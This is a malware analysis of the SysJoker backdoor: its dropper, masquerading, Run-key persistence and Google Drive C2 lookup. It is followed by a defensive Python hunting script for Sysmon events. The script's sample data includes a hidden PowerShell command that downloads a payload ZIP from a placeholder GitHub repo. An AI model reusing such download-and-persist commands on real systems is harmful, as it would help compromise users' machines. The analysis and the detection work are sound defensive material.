SysJoker, a new multi-platform backdoor that targets Windows, Linux, and macOS and evaded detection on all three operating systems, has been discovered in the wild. The malware was first noticed by Intezer researchers, who saw evidence of its activity in December 2021 while investigating an attack on a Linux-based web server.
The first SysJoker sample was uploaded to VirusTotal in the second half of 2021, which matches the registration dates of its C2 domains. Intezer produced a detailed technical analysis of SysJoker, which it shared ahead of publication.
The malware is written in C++, and each variant is tailored to its target operating system; at the time of analysis none of the variants was flagged by VirusTotal, an online scanning service that runs submissions through 57 antivirus engines. On Windows, SysJoker uses a DLL as a first-stage dropper, which runs PowerShell commands to:
- fetch the SysJocker ZIP from a GitHub repository,
- unzip it into “C:\ProgramData\RecoverySystem\”,
- execute the payload.
The malware then sleeps for up to two minutes before copying itself under the name of the Intel Graphics Common User Interface Service (“igfxCUIService.exe”), masquerading as that legitimate component. “Next, SysJoker will gather information about the machine using Living off the Land (LotL) commands. SysJoker uses different temporary text files to log the results of the commands,” Intezer’s report explains.
The temporary files are deleted immediately; the collected results are placed in a JSON object, which is then encoded and written to a file named “microsoft_Windows.dll”. After gathering the system and network information, the malware establishes persistence by adding a value under the Run key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run). All actions up to this point are separated by random sleep intervals.
The malware’s next step is to contact the actor-controlled C2 server. Its address is retrieved from a hardcoded Google Drive URL that points to a “domain.txt” file, which the operators update regularly so that live beacons keep reaching a working server and so that blocking a single C2 domain does not cut them off. In the initial handshake, the system information gathered earlier in the infection is sent to the C2, which responds with a unique token that serves as the identifier of the infected endpoint.
The C2 can then instruct the backdoor to install additional malware, run commands on the infected device, or remove itself from the device. The latter two commands, however, had not yet been implemented at the time of analysis. Although the Linux and macOS variants lack a DLL first-stage dropper, they ultimately carry out the same malicious actions on the infected host.
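The Windows infection chain above (PowerShell dropper into RecoverySystem, the igfxCUIService.exe copy, the microsoft_Windows.dll inventory file, the Run-key persistence and the Google Drive lookup for domain.txt) translates directly into a hunting rule. The following Python is an added example, not code from Intezer or from the article: it checks Sysmon-style events for those indicators. The event schema and field names, the sample events, the hostname drive.google.com for the Google Drive URL, and the assumption that the genuine Intel binary only runs from under C:\Windows are all constructed or assumed for this example, not taken from the report.

```python
"""Hunt for the SysJoker Windows infection chain in Sysmon-style events.

Indicators (paths, file names, Run key, stages) follow the write-up above;
the event schema, field names and sample events are constructed here.
"""

# Indicators from the write-up (all comparisons are case-insensitive).
DROP_DIR = "c:\\programdata\\recoverysystem"
SERVICE_NAME = "igfxcuiservice.exe"
LOG_FILE = "microsoft_windows.dll"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"
# Assumption: the hardcoded Google Drive URL resolves to this host.
DEAD_DROP_HOST = "drive.google.com"
# Assumption: the genuine Intel service binary lives only under C:\Windows.
LEGIT_PREFIX = "c:\\windows\\"


def _basename(path):
    """Last path component of a Windows path, already lower-cased."""
    return path.rsplit("\\", 1)[-1]


def check_event(ev):
    """Return a list of findings for one event (empty if nothing matched)."""
    hits = []
    kind = ev.get("EventType")
    image = ev.get("Image", "").lower()
    if kind == "ProcessCreate":
        cmd = ev.get("CommandLine", "").lower()
        # Stage 1: PowerShell pulling the ZIP from GitHub into RecoverySystem.
        if _basename(image) == "powershell.exe" and "github.com" in cmd and DROP_DIR in cmd:
            hits.append("stage1: PowerShell fetches ZIP from GitHub into RecoverySystem")
        # Masquerade: the Intel service name running from a non-Windows path.
        if _basename(image) == SERVICE_NAME and not image.startswith(LEGIT_PREFIX):
            hits.append("masquerade: igfxCUIService.exe executing outside C:\\Windows")
    elif kind == "FileCreate":
        target = ev.get("TargetFilename", "").lower()
        if _basename(target) == SERVICE_NAME and not target.startswith(LEGIT_PREFIX):
            hits.append("copy: igfxCUIService.exe written outside C:\\Windows")
        if _basename(target) == LOG_FILE:
            hits.append("recon: encoded host inventory written to microsoft_Windows.dll")
    elif kind == "RegistryValueSet":
        # Sysmon records HKCU as HKU\<SID>, so match on the Run subkey only.
        obj = ev.get("TargetObject", "").lower()
        details = ev.get("Details", "").lower()
        if RUN_KEY in obj and SERVICE_NAME in details:
            hits.append("persistence: Run key value launches igfxCUIService.exe")
    elif kind == "NetworkConnect":
        host = ev.get("DestinationHostname", "").lower()
        if _basename(image) == SERVICE_NAME and host == DEAD_DROP_HOST:
            hits.append("c2-lookup: igfxCUIService.exe fetching domain.txt from Google Drive")
    return hits


def hunt(events):
    """Return (event index, finding) pairs for every matching event."""
    findings = []
    for i, ev in enumerate(events):
        for h in check_event(ev):
            findings.append((i, h))
    return findings


# Constructed sample telemetry: five malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden Invoke-WebRequest https://github.com/example/repo/raw/main/payload.zip "
                    "-OutFile C:\\ProgramData\\RecoverySystem\\payload.zip"},
    {"EventType": "FileCreate",
     "Image": "C:\\ProgramData\\RecoverySystem\\payload.exe",
     "TargetFilename": "C:\\ProgramData\\RecoverySystem\\igfxCUIService.exe"},
    {"EventType": "FileCreate",
     "Image": "C:\\ProgramData\\RecoverySystem\\igfxCUIService.exe",
     "TargetFilename": "C:\\ProgramData\\RecoverySystem\\microsoft_Windows.dll"},
    {"EventType": "RegistryValueSet",
     "Image": "C:\\ProgramData\\RecoverySystem\\igfxCUIService.exe",
     "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\igfxCUIService",
     "Details": "C:\\ProgramData\\RecoverySystem\\igfxCUIService.exe"},
    {"EventType": "NetworkConnect",
     "Image": "C:\\ProgramData\\RecoverySystem\\igfxCUIService.exe",
     "DestinationHostname": "drive.google.com"},
    # Benign: the real Intel service starting from its usual location.
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\igfxCUIService.exe",
     "CommandLine": "igfxCUIService.exe"},
    # Benign: a browser talking to Google Drive.
    {"EventType": "NetworkConnect",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationHostname": "drive.google.com"},
]

if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Each rule on its own is noisy (Chrome also talks to Google Drive, and the real igfxCUIService.exe exists on any machine with Intel graphics), so the path check against C:\Windows and the process-name condition on the network rule are what keep the false positives down; in practice you would correlate the five stages on the same host within the infection's random sleep window rather than alert on any single one.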